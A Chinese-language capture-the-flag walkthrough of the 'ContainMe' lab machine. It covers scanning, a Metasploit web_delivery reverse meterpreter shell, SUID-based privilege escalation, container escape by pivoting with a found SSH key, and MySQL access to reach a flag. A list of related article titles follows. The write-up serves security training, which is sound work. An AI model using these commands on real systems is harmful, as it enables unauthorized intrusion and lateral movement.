靶机信息:

kali:192.168.21.129

靶机:192.168.21.151

下载地址:ContCont

信息收集

端口扫描:开放了22,80,2222,8022端口

nmap -A -p- 192.168.21.151

访问一下web端 Apache默认界面,没有什么信息

扫描一下目录,info.php文件

dirb http://192.168.21.151

看一下info.php页面,发现了这个

其余的好像没有什么特别重要的信息

再看看index.php页面

里面可能有还有其他路径,对这个页面模糊测试一下

wfuzz -c -w /usr/share/dirb/wordlists/common.txt -u http://192.168.21.151/index.php

z

找到了 加到路径后面去看能不能查看些其他东西

发现他好像只能查看有没有这个东西,不能查看文件里面的内容

测试一下看能不能执行一些命令还是其他的

接着上msf

use exploit/multi/script/web_delivery   #使用这个攻击模块
set payload php/meterpreter/reverse_tcp    #设置payload
set target php    #设置目标
show options    #查看选项

运行

把生成payload放到页面执行

msf就会产生一个会话

利用Python重新开启一个终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录下看下,有个mike目录,进去看下有什么东西

ls -al                查看所有文件以及所有的详细信息

这里发现最后文件具有可执行权限,试着执行一下看是什么东西

执行,这是个啥

因为现在为www-data用户,权限非常低,利用一下find提权吧,可以暂时提权root权限

不懂的话可以看看其他文章

find / -perm -4000 2>/dev/null

注意这个

进入到这个目录然后执行相应的文件,这个时候发现我们已经是root权限了,但是我们发现好像Id依然显示的是www-data用户

总感觉没有哪里怪怪的,好像没有跳出容器,继续吧,看一下网络接口

想办法整个nmap过来,扫描一下接口还有没有其他主机;扫描之后发现还有个主机172.16.20.6

且该主机的22端口开放

别忘了我们刚才在用户目录下发现了.ssh的备份文件

看下里面有什么

ssh mike@172.16.20.6 -i id_rsa        #-i 指定连接文件

查看开放的端口,3306        MySQL端口,里面肯定有东西,连接

 ss -tlnu

退出,切换root用户

进入到root目录下发现有个压缩文件

利用unzip解压,需要密码。密码已经在数据库里头了,解压完成后发现flag在里头

对vulhub靶机THM-ContainMe-v4的渗透测试过程相关推荐

  1. 渗透测试php过程,利用骑士cms的一次纠结的渗透测试过程(两个潜在

    今天下载了骑士cms的最新版本,由于好久以前一个哥们发了一个后台拿shell的漏洞,还有别人发的一个sql注入的漏洞,一个有意思的渗透测试过程就从这两个地方开始了,成功的拿下了某大型人才网站的服务器, ...

  2. vulhub靶机joker渗透

    先设置为NAT模式 主机发现 Masscan快速扫描端口 服务扫描 访问8080端口,需要用户名和密码来登录 抓包,发现是base64加密,类似于tomcat的用户名和密码格式 放到intruder模 ...

  3. 攻击CSK靶机环境并学习linux渗透思路

    CATALOG 前言 环境配置 第一步:配置vmware的vmnet8的dhcp 第二步:下载csk靶机 第三步:打开靶机 开始攻击 第一步:扫描 第二步:利用漏洞获得shell 第三步:提权 提权操 ...

  4. centos7搭建vulhub靶机教程

    一.搭建靶场 1.安装docker yum -y install docker 出现完毕(complete)则表示安装完成 2.启动docker服务 systemctl start docker 报错 ...

  5. OSCP练习:vulhub靶机TR0LL 1攻略

    信息收集 主机发现 nmap -sC -sV 192.168.8.132 发现21.22.80端口 网站信息收集 访问80端口,没啥有用信息 访问ftp 使用 Anonymous 匿名用户登录,密码为 ...

  6. OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

    nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...

  7. INE Penetration Testing Basics 黑盒渗透测试过程

    简介 官方网站: https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics 黑盒渗透测试1 启动实验室, ...

  8. 渗透测试的8个步骤 展现一次完整的渗透测试过程及思路

    渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 .之前安全加介绍了金融行业 实战微信银行渗透测试, 运营商 渗透测试实战 ,今天让我们来说说 渗透测试 的流程及渗透测试相关 ...

  9. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  10. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

最新文章

  1. OpenCV支持的图像格式
  2. 【数字信号处理】序列表示与运算 ( 序列乘以常数 | 序列相加 | 序列移位 | 序列尺度变换 )
  3. matlab第二次上机作业答案,第二次上机作业
  4. 用Spring长轮询Tomcat
  5. 今天来聊聊 Redis 的主从复制
  6. 取 java 程序运行的路径_获取Java程序运行的路径 | 获取当前jar包的路径
  7. 用C#来播放.wav格式的音频文件
  8. gis python趋势变化代码_GIS技术发展趋势——2018年回顾与2019年展望
  9. 欠薪的公司,不要做任何犹豫!
  10. USACO1.3.4 Combination Lock
  11. 配置Gitlab Push自动触发jenkins构建
  12. 图像坐标系、相机坐标系和世界坐标系 相机的内、外参数矩阵
  13. 微星显卡拷机测试软件,显卡稳定性测试必备 微星Kombustor工具
  14. mysql 日历表_mysql创建日历表
  15. 方舟怎么看服务器信息,方舟怎么看服务器ip地址
  16. java pdf替换内容_java PDF批量替换关键词
  17. 高德地图 去掉左下角logo
  18. 彻底关闭Chrome浏览器更新及右上角的更新提示
  19. 数学建模常见算法:拟合算法
  20. 交互设计:界面设计尺寸详解与常用尺寸

热门文章

  1. 第三十一篇 -- 学习第六十八天打卡20190911
  2. 动态规划(DP)经典模型
  3. 如何找到计算机上的画图拦,电脑中自带的Window画图工具不见了怎么恢复
  4. python字典内置方法_python之字典二 内置方法总结
  5. 九月十月百度人搜,阿里巴巴,腾讯华为小米搜狗笔试面试八十题
  6. 点击页面出现富强民主,文明和谐之类的文字
  7. Leetcode之Teemo Attacking 问题
  8. C语言课程设计大作业——学生管理系统(详细含报告和源码)
  9. 前端监控--通过钉钉自定义机器人发送告警消息
  10. CNZZ埋点及点击量统计方法